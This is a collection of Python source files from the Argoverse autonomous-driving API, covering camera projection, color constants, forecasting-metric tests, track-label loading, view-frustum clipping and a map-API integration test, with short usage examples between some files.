is_valid_points_cam = points_cam[is_uv_valid]
return uv_valid, is_valid_points_cam
```
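The projection pipeline above (egovehicle frame to camera frame via the extrinsics, then the intrinsic matrix, then frustum culling) can be exercised with a short sketch. The numbers below are hypothetical, and the identity `ego_SE3_cam` pose is only for illustration; the sketch assumes the `SE3` dataclass is constructed from a rotation matrix and translation vector, consistent with how its `rotation` attribute is used elsewhere in this file.
```python
import numpy as np
from av2.geometry.se3 import SE3
# Intrinsics and PinholeCamera are the classes defined above.
# Hypothetical intrinsics: 1000 px focal length, principal point at the image center.
intrinsics = Intrinsics(fx_px=1000.0, fy_px=1000.0, cx_px=1024.0, cy_px=775.0, width_px=2048, height_px=1550)
# Hypothetical pose: camera axes aligned with the egovehicle frame.
ego_SE3_cam = SE3(rotation=np.eye(3), translation=np.zeros(3))
cam = PinholeCamera(ego_SE3_cam=ego_SE3_cam, intrinsics=intrinsics, cam_name="ring_front_center")
# Three egovehicle-frame points; the last one lies behind the camera and fails the cheirality check.
points_ego = np.array([[0.0, 0.0, 10.0], [2.0, 1.0, 20.0], [0.0, 0.0, -5.0]])
uv, points_cam, is_valid = cam.project_ego_to_img(points_ego)
print(uv[is_valid])  # pixel coordinates of the points that land inside the view frustum
```
With these numbers the first point projects to the principal point (1024, 775) and the third point is culled.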
#### File: av2/rendering/color.py
```python
from typing import Final, Sequence, Tuple
import numpy as np
from matplotlib.colors import LinearSegmentedColormap
from av2.utils.typing import NDArrayFloat
RED_HEX: Final[str] = "#df0101"
GREEN_HEX: Final[str] = "#31b404"
RED_RGB: Final[Tuple[int, int, int]] = (255, 0, 0)
RED_BGR: Final[Tuple[int, int, int]] = RED_RGB[::-1]
BLUE_RGB: Final[Tuple[int, int, int]] = (0, 0, 255)
BLUE_BGR: Final[Tuple[int, int, int]] = BLUE_RGB[::-1]
HANDICAP_BLUE_RGB: Final[Tuple[int, int, int]] = (42, 130, 193)
HANDICAP_BLUE_BGR: Final[Tuple[int, int, int]] = HANDICAP_BLUE_RGB[::-1]
WHITE_RGB: Final[Tuple[int, int, int]] = (255, 255, 255)
WHITE_BGR: Final[Tuple[int, int, int]] = WHITE_RGB[::-1]
GRAY_BGR: Final[Tuple[int, int, int]] = (168, 168, 168)
DARK_GRAY_BGR: Final[Tuple[int, int, int]] = (100, 100, 100)
TRAFFIC_YELLOW1_RGB: Final[Tuple[int, int, int]] = (250, 210, 1)
TRAFFIC_YELLOW1_BGR: Final[Tuple[int, int, int]] = TRAFFIC_YELLOW1_RGB[::-1]
def create_colormap(color_list: Sequence[str], n_colors: int) -> NDArrayFloat:
"""Create hex colorscale to interpolate between requested colors.
Args:
color_list: list of requested colors, in hex format.
n_colors: number of colors in the colormap.
Returns:
array of shape (n_colors, 3) representing a list of RGB colors in [0,1]
"""
cmap = LinearSegmentedColormap.from_list(name="dummy_name", colors=color_list)
colorscale: NDArrayFloat = np.array([cmap(k * 1 / n_colors) for k in range(n_colors)])
# ignore the 4th alpha channel
return colorscale[:, :3] # type: ignore
```
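A minimal usage sketch for `create_colormap`, assuming only the constants defined above: sample a five-step ramp between the red and green hex colors.
```python
# Interpolate from RED_HEX to GREEN_HEX and sample 5 RGB triplets in [0, 1].
ramp = create_colormap([RED_HEX, GREEN_HEX], n_colors=5)
print(ramp.shape)  # (5, 3)
```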
#### File: motion_forecasting/eval/test_metrics.py
```python
from typing import Final
import numpy as np
import pytest
import av2.datasets.motion_forecasting.eval.metrics as metrics
from av2.utils.typing import NDArrayFloat, NDArrayNumber
# Build stationary GT trajectory at (0, 0)
test_N: Final[int] = 10
_STATIONARY_GT_TRAJ = np.zeros((test_N, 2))
# Case 1: K=1 forecast stationary at (1, 1)
forecasted_trajectories_stationary_k1 = np.ones((1, test_N, 2))
expected_ade_stationary_k1 = np.full((1,), np.sqrt(2))
expected_fde_stationary_k1 = np.full((1,), np.sqrt(2))
# Case 2: K=6 forecasts stationary at (1, 1)
forecasted_trajectories_stationary_k6 = np.ones((6, test_N, 2))
expected_ade_stationary_k6 = np.full((6,), np.sqrt(2))
expected_fde_stationary_k6 = np.full((6,), np.sqrt(2))
# Case 3: K=1 forecast in straight line on X axis
forecasted_trajectories_straight_k1 = np.stack([np.arange(test_N), np.zeros(test_N)], axis=1)[np.newaxis, ...] # 1xNx2
expected_ade_straight_k1 = np.full((1,), np.arange(test_N).mean())
expected_fde_straight_k1 = np.full((1,), test_N - 1)
# Case 4: K=6 forecasts in straight line on X axis
forecasted_trajectories_straight_k6: NDArrayFloat = np.concatenate( # type: ignore
[forecasted_trajectories_straight_k1] * 6, axis=0
) # 6xNx2
expected_ade_straight_k6 = np.full((6,), np.arange(test_N).mean())
expected_fde_straight_k6 = np.full((6,), test_N - 1)
# Case 5: K=1 forecast in diagonal line
forecasted_trajectories_diagonal_k1 = np.stack([np.arange(test_N), np.arange(test_N)], axis=1)[np.newaxis, ...] # 1xNx2
expected_ade_diagonal_k1 = np.full((1,), 6.36396103)
expected_fde_diagonal_k1 = np.full((1,), np.hypot(test_N - 1, test_N - 1))
@pytest.mark.parametrize(
"forecasted_trajectories, expected_ade",
[
(forecasted_trajectories_stationary_k1, expected_ade_stationary_k1),
(forecasted_trajectories_stationary_k6, expected_ade_stationary_k6),
(forecasted_trajectories_straight_k1, expected_ade_straight_k1),
(forecasted_trajectories_straight_k6, expected_ade_straight_k6),
(forecasted_trajectories_diagonal_k1, expected_ade_diagonal_k1),
],
ids=["stationary_k1", "stationary_k6", "straight_k1", "straight_k6", "diagonal_k1"],
)
def test_compute_ade(forecasted_trajectories: NDArrayNumber, expected_ade: NDArrayFloat) -> None:
"""Test that compute_ade returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
expected_ade: Expected average displacement error.
"""
ade = metrics.compute_ade(forecasted_trajectories, _STATIONARY_GT_TRAJ)
np.testing.assert_allclose(ade, expected_ade) # type: ignore
@pytest.mark.parametrize(
"forecasted_trajectories, expected_fde",
[
(forecasted_trajectories_stationary_k1, expected_fde_stationary_k1),
(forecasted_trajectories_stationary_k6, expected_fde_stationary_k6),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1),
(forecasted_trajectories_straight_k6, expected_fde_straight_k6),
(forecasted_trajectories_diagonal_k1, expected_fde_diagonal_k1),
],
ids=["stationary_k1", "stationary_k6", "straight_k1", "straight_k6", "diagonal_k1"],
)
def test_compute_fde(forecasted_trajectories: NDArrayNumber, expected_fde: NDArrayFloat) -> None:
"""Test that compute_fde returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
expected_fde: Expected final displacement error.
"""
fde = metrics.compute_fde(forecasted_trajectories, _STATIONARY_GT_TRAJ)
assert np.array_equal(fde, expected_fde)
@pytest.mark.parametrize(
"forecasted_trajectories, miss_threshold_m, expected_is_missed_label",
[
(forecasted_trajectories_stationary_k1, 2.0, False),
(forecasted_trajectories_stationary_k6, 2.0, False),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1[0] + 0.01, False),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1[0] - 0.01, True),
(forecasted_trajectories_diagonal_k1, 2.0, True),
],
ids=["stationary_k1", "stationary_k6", "straight_below_threshold", "straight_above_threshold", "diagonal"],
)
def test_compute_is_missed_prediction(
forecasted_trajectories: NDArrayNumber, miss_threshold_m: float, expected_is_missed_label: bool
) -> None:
"""Test that compute_is_missed_prediction returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
miss_threshold_m: Minimum distance threshold for final displacement to be considered a miss.
expected_is_missed_label: Expected is_missed label for test case.
"""
is_missed_prediction = metrics.compute_is_missed_prediction(
forecasted_trajectories, _STATIONARY_GT_TRAJ, miss_threshold_m
)
# Check that is_missed labels are of the correct shape and have the correct value
assert is_missed_prediction.shape == forecasted_trajectories.shape[:1]
assert np.all(is_missed_prediction == expected_is_missed_label)
``` |
{
"source": "johnwlambert/argoverse-api",
"score": 2
} |
#### File: argoverse/data_loading/trajectory_loader.py
```python
import collections
import glob
import json
import logging
import sys
from typing import List
import numpy as np
from argoverse.data_loading.object_classes import OBJ_CLASS_MAPPING_DICT
logger = logging.getLogger(__name__)
class TrajectoryLabel:
"""Trajectory object.
Args:
timestamps (np.array): Array of timestamps for trajectory.
quaternions (np.array): Array of quaternions for trajectory.
translations (np.array): Array of translations of SE3 poses for trajectory.
obj_class (int): Object class id.
obj_class_str (str): Object class name.
occlusions (np.array): Array of occlusions for trajectory.
track_uuid (str): Track uuid.
log_id (str): Log id.
max_length (float): Maximum length for trajectory.
max_width (float): Maximum width for trajectory.
max_height (float): Maximum height for trajectory.
lengths (np.array): Array of lengths for trajectory.
widths (np.array): Array of widths for trajectory.
heights (np.array): Array of heights for trajectory.
"""
def __init__(
self,
timestamps: np.ndarray,
quaternions: np.ndarray,
translations: np.ndarray,
obj_class: int,
obj_class_str: str,
occlusions: np.ndarray,
track_uuid: str,
log_id: str,
max_length: float,
max_width: float,
max_height: float,
lengths: np.ndarray,
widths: np.ndarray,
heights: np.ndarray,
) -> None:
"""Initialize TrajectoryLabel object.
Args:
timestamps (np.array): Array of timestamps for trajectory.
quaternions (np.array): Array of quaternions for trajectory.
translations (np.array): Array of translations of SE3 poses for trajectory.
obj_class (int): Object class id.
obj_class_str (str): Object class name.
occlusions (np.array): Array of occlusions for trajectory.
track_uuid (str): Track uuid.
log_id (str): Log id.
max_length (float): Maximum length for trajectory.
max_width (float): Maximum width for trajectory.
max_height (float): Maximum height for trajectory.
lengths (np.array): Array of lengths for trajectory.
widths (np.array): Array of widths for trajectory.
heights (np.array): Array of heights for trajectory.
"""
self.timestamps = timestamps
self.quaternions = quaternions
self.translations = translations
self.obj_class = obj_class
self.obj_class_str = obj_class_str
self.occlusion = occlusions
self.track_uuid = track_uuid
self.log_id = log_id
self.max_length = max_length
self.max_width = max_width
self.max_height = max_height
self.lengths = lengths
self.widths = widths
self.heights = heights
def load_json_track_labels(log_track_labels_dir: str) -> List[TrajectoryLabel]:
"""Trajectories are stored on disk as 1 track per 1 json file.
We load all labeled tracks here from the JSON files.
Args:
log_track_labels_dir (str): Log track directory.
Returns:
List[TrajectoryLabel]: a Python list of TrajectoryLabels.
"""
json_fpath_list = glob.glob(log_track_labels_dir, recursive=True)
trajectories = []
for file_idx, json_fpath in enumerate(json_fpath_list):
with open(json_fpath, "r") as f:
json_data = json.load(f)
track_uuid = json_fpath.split("/")[-1].split(".")[0]
obj_cls = json_data["label_class"]
# recent MLDS change
if isinstance(obj_cls, collections.abc.Mapping):
obj_cls = obj_cls["name"]
if obj_cls in OBJ_CLASS_MAPPING_DICT:
obj_cls_idx = OBJ_CLASS_MAPPING_DICT[obj_cls]
else:
logger.error(f"Unrecognized class {obj_cls}")
raise ValueError(f"Unrecognized class {obj_cls}")
quaternions = []
translations = []
timestamps = []
occlusions = []
lengths = []
widths = []
heights = []
for track_frame in json_data["track_label_frames"]:
# cuboid not occluded if not explicitly indicated.
occlusions.append(track_frame.get("occlusion", 0))
tr_center = track_frame["center"]
tr_x = tr_center["x"]
tr_y = tr_center["y"]
tr_z = tr_center["z"]
translation = np.array([tr_x, tr_y, tr_z])
translations.append(translation)
tr_rot = track_frame["rotation"]
rot_w = tr_rot["w"]
rot_x = tr_rot["x"]
rot_y = tr_rot["y"]
rot_z = tr_rot["z"]
quaternion = np.array([rot_w, rot_x, rot_y, rot_z])
quaternions.append(quaternion)
timestamps.append(track_frame["timestamp"])
lengths.append(track_frame["length"])
widths.append(track_frame["width"])
heights.append(track_frame["height"])
trajectory = TrajectoryLabel(
timestamps=np.array(timestamps),
quaternions=np.array(quaternions),
translations=np.array(translations),
obj_class=obj_cls_idx,
obj_class_str=obj_cls,
occlusions=np.array(occlusions),
track_uuid=track_uuid,
log_id=json_fpath.split("/")[-3],
max_length=max(lengths),
max_width=max(widths),
max_height=max(heights),
lengths=np.array(lengths),
widths=np.array(widths),
heights=np.array(heights),
)
trajectories.append(trajectory)
return trajectories
```
#### File: argoverse/utils/frustum_clipping.py
```python
import copy
import sys
from typing import Any, Iterable, List, Optional, Tuple
import numpy as np
from argoverse.utils.camera_stats import get_image_dims_for_camera
from argoverse.utils.manhattan_search import compute_point_cloud_bbox
def fit_plane_to_point_cloud(pc: np.ndarray) -> Tuple[Any, Any, Any, Any]:
"""Use SVD with at least 3 points to fit a plane.
Args:
pc: Array of shape (N, 3)
Returns:
a, b, c, d: float-like values defining ax + by + cz = d for the plane
"""
center = pc.sum(axis=0) / pc.shape[0]
u, s, vh = np.linalg.svd(pc - center)
# Get the unitary normal vector
u_norm = vh[2, :]
d = -np.dot(u_norm, center)
a, b, c = u_norm
return a, b, c, d
def form_right_clipping_plane(fx: float, img_width: int) -> np.ndarray:
"""Form the right clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z)--(x,y,z)
| /
| / ->outside of frustum
| / ->outside of frustum
| (w/2)/
o-----o IMAGE PLANE
| /
fx| /
| /
| /
O PINHOLE
Normal must point into the frustum. The plane moves +fx in z-axis for
every +w/2 in x-axis, so normal will have negative inverse slope components.
Then, enforce that x-component of normal points in negative direction.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_width: Image width in pixels
Returns:
right_plane: Array of shape (4,) for ax + by + cz = d
"""
right_plane = np.array([-fx, 0.0, img_width / 2.0, 0.0])
right_plane /= np.linalg.norm(right_plane)
return right_plane
def form_left_clipping_plane(fx: float, img_width: int) -> np.ndarray:
r"""Form the left clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z)-----(x,y,z)
\\ |
outside of frustum <- \\ |
outside of frustum <- \\ |
\\ (-w/2)|
o------o IMAGE PLANE
\\ |
\\ |
\\ |fx
\\ |
\\ |
O PINHOLE
Normal must point into the frustum. The plane moves +fx in z-axis for
every -w/2 in x-axis, so normal will have negative inverse slope components.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_width: Image width in pixels
Returns:
left_plane: Array of shape (4,) for ax + by + cz = d
"""
left_plane = np.array([fx, 0.0, img_width / 2.0, 0.0])
left_plane /= np.linalg.norm(left_plane)
return left_plane
def form_top_clipping_plane(fx: float, img_height: int) -> np.ndarray:
r"""Form the top clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z) (x,y,z)
\\=================//
\\ //
(-w/h,-h/2,fx) (w/h,-h/2,fx)
o-------------o
|\\ //| IMAGE PLANE
| \\ // | IMAGE PLANE
o--\\-----//--o
\\ //
\\ //
O PINHOLE
Normal must point into the frustum. The plane moves -h/2 in y-axis for every
+fx in z-axis, so normal will have negative inverse slope components. The
x-axis component is zero since constant in x.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_height: Image height in pixels
Returns:
top_plane: Array of shape (4,) for ax + by + cz = d
"""
top_plane = np.array([0.0, fx, img_height / 2.0, 0.0])
top_plane /= np.linalg.norm(top_plane)
return top_plane
def form_low_clipping_plane(fx: float, img_height: int) -> np.ndarray:
r"""Form the low clipping plane for a camera view frustum.
Use 3 points to fit the low clipping plane. In the camera coordinate frame,
y is down the imager, x is across the imager, and z is along the optical axis.
We know that a similar triangle is formed as follows::
(x,y,z) (x,y,z)
\\ //
\\ o-------------o //
\\| IMAGE PLANE |//
| |/
(-w/h, h/2,fx) o-------------o (w/h, h/2,fx)
\\ //
\\ //
\\ //
\\ //
\\ //
O PINHOLE
Normal must point into the frustum. The plane moves +h/2 in y-axis for every
+fx in z-axis, so normal will have negative inverse slope components. The
x-axis component is zero since constant in x.
Then enforce that y-coord of normal points in neg y-axis dir(up) on low-clipping plane.
The z-coord should point in positive z-axis direction (away from camera).
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_height: Image height in pixels
Returns:
low_plane: Array of shape (4,) for ax + by + cz = d
"""
low_plane = np.array([0.0, -fx, img_height / 2.0, 0.0])
low_plane /= np.linalg.norm(low_plane)
return low_plane
def form_near_clipping_plane(near_clip_dist: float) -> np.ndarray:
"""Form the near clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The near clipping plane should point in
the positive z-direction (along optical axis).
We form "ax + by + cz = d", where "d" is a distance from the origin.
Args:
near_clip_dist: Near clipping plane distance in meters
Returns:
top_plane: Array of shape (4,) for ax + by + cz = d
"""
return np.array([0.0, 0.0, 1.0, -near_clip_dist])
def generate_frustum_planes(K: np.ndarray, camera_name: str, near_clip_dist: float = 0.5) -> Optional[List[np.ndarray]]:
"""Compute the planes enclosing the field of view (viewing frustum) for a single camera.
We do this using similar triangles.
tan(theta/2) = (0.5 * height)/focal_length
"theta" is the vertical FOV. Similar for horizontal FOV.
height and focal_length are both in pixels.
Note that ring cameras and stereo cameras have different image widths
and heights, affecting the field of view.
Ring Camera intrinsics K look like (in pixels)::
[1400, 0, 964] [fx,skew,cx]
[ 0,1403, 605] for [-, fy,cy]
[ 0, 0, 1] [0, 0, 1]
Args:
K: Array of shape (3, 3) representing camera intrinsics matrix
camera_name: String representing the camera name to get the dimensions of and compute the FOV for
near_clip_dist: The distance for the near clipping plane in meters
Returns:
planes: List of length 5, where each list element is an Array of shape (4,)
representing the equation of a plane, e.g. (a, b, c, d) in ax + by + cz = d
"""
img_width, img_height = get_image_dims_for_camera(camera_name)
if img_width is None or img_height is None:
return None
P = np.array([0.0, 0.0, 0.0])
fx = K[0, 0]
fy = K[1, 1]
right_plane = form_right_clipping_plane(fx, img_width)
left_plane = form_left_clipping_plane(fx, img_width)
near_plane = form_near_clipping_plane(near_clip_dist)
# The horizontal and vertical focal lengths should be very close to equal,
# otherwise something went wrong when forming K matrix.
assert np.absolute(fx - fy) < 10
low_plane = form_low_clipping_plane(fx, img_height)
top_plane = form_top_clipping_plane(fx, img_height)
planes = [left_plane, right_plane, near_plane, low_plane, top_plane]
return planes
def clip_segment_v3_plane_n(p1: np.ndarray, p2: np.ndarray, planes: List[np.ndarray]) -> Tuple[np.ndarray, np.ndarray]:
"""Iterate over the frustum planes and intersect them with the segment.
    This updates the running min/max clip factors, bailing out early if the min exceeds the max.
We exploit the fact that in a camera frustum, all plane
normals point inside the frustum volume.
See section "Line-Plane Intersection" for technical details at: http://geomalgorithms.com/a05-_intersect-1.html
"t" is the distance we travel along the ray from p1 to p2.
If "t" exceeds 1.0, then we have exceeded the line segment.
A similar function, written in C, can be found in the Blender source code at:
https://fossies.org/dox/blender-2.79b/math__geom_8c_source.html
Args:
p1: 3D vector defining a point to constrain a line segment
p2: 3D vector defining a point to constrain a line segment
planes: List of length 5, where each list element is an Array of shape (4,)
representing the equation of a plane, e.g. (a, b, c, d) in ax + by + cz = d
Returns:
2 vector triplets (the clipped segment) or (None, None) meaning the segment is entirely outside the frustum.
"""
dp = p2 - p1
p1_fac = 0.0
p2_fac = 1.0
for p in planes:
div = p[:3].dot(dp)
# check if line vector and plane normal are perpendicular
# if perpendicular, line and plane are parallel
if div != 0.0:
# if not perpendicular, find intersection
t = -plane_point_side_v3(p, p1)
if div > 0.0: # clip p1 lower bounds
if t >= div:
return None, None
if t > 0.0:
fac = t / div
if fac > p1_fac:
p1_fac = fac
if p1_fac > p2_fac:
# intersection occurs outside of segment
return None, None
elif div < 0.0: # clip p2 upper bounds
if t > 0.0:
return None, None
if t > div:
fac = t / div
if fac < p2_fac:
p2_fac = fac
if p1_fac > p2_fac:
return None, None
p1_clip = p1 + (dp * p1_fac)
p2_clip = p1 + (dp * p2_fac)
return p1_clip, p2_clip
def plane_point_side_v3(p: np.ndarray, v: np.ndarray) -> Any:
"""Get sign of point to plane distance.
This function does not compute the actual distance.
Positive denotes that point v is on the same side of the plane as the plane's normal vector.
Negative if it is on the opposite side.
Args:
p: Array of shape (4,) representing a plane in Hessian Normal Form, ax + by + cz + d = 0
v: A vector/3D point
Returns:
sign: A float-like value representing sign of signed distance
"""
return p[:3].dot(v) + p[3]
def cuboid_to_2d_frustum_bbox(corners: np.ndarray, planes: List[np.ndarray], K: np.ndarray) -> np.ndarray:
"""Convert a 3D cuboid to a 2D frustum bounding box.
We bring the 3D points into each camera, and do the clipping there.
Args:
corners: The corners to use as the corners of the frustum bounding box
planes: List of 4-tuples for ax + by + cz = d representing planes in Hessian Normal Form
K: 3x3 camera intrinsic matrix
Returns:
bbox_2d: Numpy array of shape (4,) with entries [x_min,y_min,x_max,y_max]
"""
def clip_line_segment(pt_a: np.ndarray, pt_b: np.ndarray, K: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""Clip a line segment based on two points and the camera instrinc matrix.
Args:
pt_a: One 3D point vector constraining a line segment
pt_b: One 3D point vector constraining a line segment
K: A 3x3 array representing a camera intrinsic matrix
Returns:
a, b: A tuple of the clipped line segment 3D point vectors
"""
pt_a = K.dot(pt_a)
pt_a /= pt_a[2]
pt_b = K.dot(pt_b)
pt_b /= pt_b[2]
return np.round(pt_a).astype(np.int32), np.round(pt_b).astype(np.int32)
def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:
"""Clip a rectangle based on the selected corners and clipped vertices coordinates.
Args:
selected_corners: A list of selected corners
clipped_uv_verts: A list of clipped vertices
Returns:
A new list of clipped vertices based on the selected corners
"""
prev = selected_corners[-1]
for corner in selected_corners:
# interpolate line segments to the image border
clip_prev, clip_corner = clip_segment_v3_plane_n(
copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)
)
prev = corner
if clip_prev is None or clip_corner is None:
continue
a, b = clip_line_segment(clip_prev, clip_corner, K)
clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])
return clipped_uv_verts
clipped_uv_verts = np.zeros((0, 2))
# Draw the sides
for i in range(4):
corner_f = corners[i] # front corner
corner_b = corners[i + 4] # back corner
clip_c_f, clip_c_b = clip_segment_v3_plane_n(corner_f, corner_b, planes)
if clip_c_f is None or clip_c_b is None:
continue
a, b = clip_line_segment(clip_c_f, clip_c_b, K)
clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])
# Draw front (first 4 corners) and rear (last 4 corners) rectangles(3d)/lines(2d)
front_verts = clip_rect(corners[:4], clipped_uv_verts)
back_verts = clip_rect(corners[4:], clipped_uv_verts)
clipped_uv_verts = np.vstack([clipped_uv_verts, front_verts.reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, back_verts.reshape(-1, 2)])
if clipped_uv_verts.shape[0] == 0:
return None
bbox_2d = compute_point_cloud_bbox(clipped_uv_verts)
return bbox_2d
```
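A quick end-to-end sketch of the helpers above: build the five frustum planes directly from a made-up focal length and image size (bypassing `generate_frustum_planes`, which needs a real camera name for `get_image_dims_for_camera`), then clip a segment that starts behind the near plane. All numbers are illustrative.

```python
import numpy as np
from argoverse.utils.frustum_clipping import (
    clip_segment_v3_plane_n,
    form_left_clipping_plane,
    form_low_clipping_plane,
    form_near_clipping_plane,
    form_right_clipping_plane,
    form_top_clipping_plane,
)

# Hypothetical pinhole parameters (pixels / meters).
fx, img_width, img_height, near_clip = 1000.0, 1000, 600, 0.5

planes = [
    form_left_clipping_plane(fx, img_width),
    form_right_clipping_plane(fx, img_width),
    form_near_clipping_plane(near_clip),
    form_low_clipping_plane(fx, img_height),
    form_top_clipping_plane(fx, img_height),
]

# Segment along the optical axis that starts behind the camera.
p1 = np.array([0.0, 0.0, -1.0])
p2 = np.array([0.0, 0.0, 5.0])
p1_clip, p2_clip = clip_segment_v3_plane_n(p1, p2, planes)
print(p1_clip, p2_clip)  # expected: p1 pushed onto the near plane, ~[0, 0, 0.5]; p2 unchanged, [0, 0, 5]
```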
#### File: argoverse-api/integration_tests/test_map_api.py
```python
import glob
import matplotlib.pyplot as plt
import numpy as np
from argoverse.map_representation.map_api import ArgoverseMap
from argoverse.utils.datetime_utils import generate_datetime_string
from argoverse.utils.geometry import point_inside_polygon
from argoverse.utils.json_utils import read_json_file
from argoverse.utils.mpl_plotting_utils import plot_lane_segment_patch
def add_lane_segment_to_ax(ax, lane_centerline, lane_polygon, patch_color, xmin, xmax, ymin, ymax):
"""
"""
plot_lane_segment_patch(lane_polygon, ax, color=patch_color, alpha=0.3)
def find_lane_segment_bounds_in_table(avm, city_name, lane_segment_id):
    """Look up the hallucinated (xmin, ymin, xmax, ymax) bounds of a lane segment in the map's bbox table."""
match_found = False
# find the lane segment inside the table
for table_idx, table_lane_id in avm.city_halluc_tableidx_to_laneid_map[city_name].items():
if lane_segment_id == table_lane_id:
match_found = True
break
if not match_found:
print("Failure -- Lane ID not found!")
quit()
(xmin, ymin, xmax, ymax) = avm.city_halluc_bbox_table[city_name][table_idx]
return xmin, ymin, xmax, ymax
def verify_halluc_lane_extent_index(enable_lane_boundaries=False):
"""
"""
avm = ArgoverseMap()
city_names = ["MIA", "PIT"]
for city_name in city_names:
# get all lane segment IDs inside of this city
lane_segment_ids = list(avm.city_lane_centerlines_dict[city_name].keys())
for lane_segment_id in lane_segment_ids:
            xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, lane_segment_id)
predecessor_ids = avm.get_lane_segment_predecessor_ids(lane_segment_id, city_name)
successor_ids = avm.get_lane_segment_successor_ids(lane_segment_id, city_name)
(r_neighbor_id, l_neighbor_id) = avm.get_lane_segment_adjacent_ids(lane_segment_id, city_name)
lane_centerline = avm.get_lane_segment_centerline(lane_segment_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(lane_segment_id, city_name)
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
# add the lane of interest
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "y", xmin, xmax, ymin, ymax)
if predecessor_ids is not None:
# add predecessors
for predecessor_id in predecessor_ids:
lane_centerline = avm.get_lane_segment_centerline(predecessor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(predecessor_id, city_name)
                    xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, predecessor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "r", xmin, xmax, ymin, ymax)
if successor_ids is not None:
# add successors
for successor_id in successor_ids:
lane_centerline = avm.get_lane_segment_centerline(successor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(successor_id, city_name)
                    xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, successor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "b", xmin, xmax, ymin, ymax)
# add left neighbor
if l_neighbor_id is not None:
lane_centerline = avm.get_lane_segment_centerline(l_neighbor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(l_neighbor_id, city_name)
                xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, l_neighbor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "g", xmin, xmax, ymin, ymax)
# add right neighbor
if r_neighbor_id is not None:
lane_centerline = avm.get_lane_segment_centerline(r_neighbor_id, city_name)
halluc_lane_polygon = avm.get_lane_segment_polygon(r_neighbor_id, city_name)
                xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, r_neighbor_id)
add_lane_segment_to_ax(ax, lane_centerline, halluc_lane_polygon, "m", xmin, xmax, ymin, ymax)
if enable_lane_boundaries:
# Compare with Argo's proprietary, ground truth lane boundaries
gt_lane_polygons = avm.city_to_lane_polygons_dict[city_name]
for gt_lane_polygon in gt_lane_polygons:
dist = np.linalg.norm(gt_lane_polygon.mean(axis=0)[:2] - np.array([xmin, ymin]))
if dist < 30:
ax.plot(gt_lane_polygon[:, 0], gt_lane_polygon[:, 1], color="k", alpha=0.3, zorder=1)
ax.axis("equal")
plt.show()
datetime_str = generate_datetime_string()
plt.savefig(f"lane_segment_id_{lane_segment_id}_@_{datetime_str}.jpg")
plt.close("all")
def verify_manhattan_search_functionality():
"""
Minimal example where we
"""
    avm = ArgoverseMap()
# query_x = 254.
# query_y = 1778.
ref_query_x = 422.0
ref_query_y = 1005.0
city_name = "PIT" # 'MIA'
for trial_idx in range(10):
query_x = ref_query_x + (np.random.rand() - 0.5) * 10
query_y = ref_query_y + (np.random.rand() - 0.5) * 10
# query_x,query_y = (3092.49845414,1798.55426805)
query_x, query_y = (3112.80160113, 1817.07585338)
lane_segment_ids = avm.get_lane_ids_in_xy_bbox(query_x, query_y, city_name, 5000)
fig = plt.figure(figsize=(22.5, 8))
ax = fig.add_subplot(111)
# ax.scatter([query_x], [query_y], 500, color='k', marker='.')
plot_lane_segment_patch(pittsburgh_bounds, ax, color="m", alpha=0.1)
if len(lane_segment_ids) > 0:
for i, lane_segment_id in enumerate(lane_segment_ids):
patch_color = "y" # patch_colors[i % 4]
lane_centerline = avm.get_lane_segment_centerline(lane_segment_id, city_name)
test_x, test_y = lane_centerline.mean(axis=0)
inside = point_inside_polygon(
n_poly_vertices, pittsburgh_bounds[:, 0], pittsburgh_bounds[:, 1], test_x, test_y
)
if inside:
halluc_lane_polygon = avm.get_lane_segment_polygon(lane_segment_id, city_name)
                    xmin, ymin, xmax, ymax = find_lane_segment_bounds_in_table(avm, city_name, lane_segment_id)
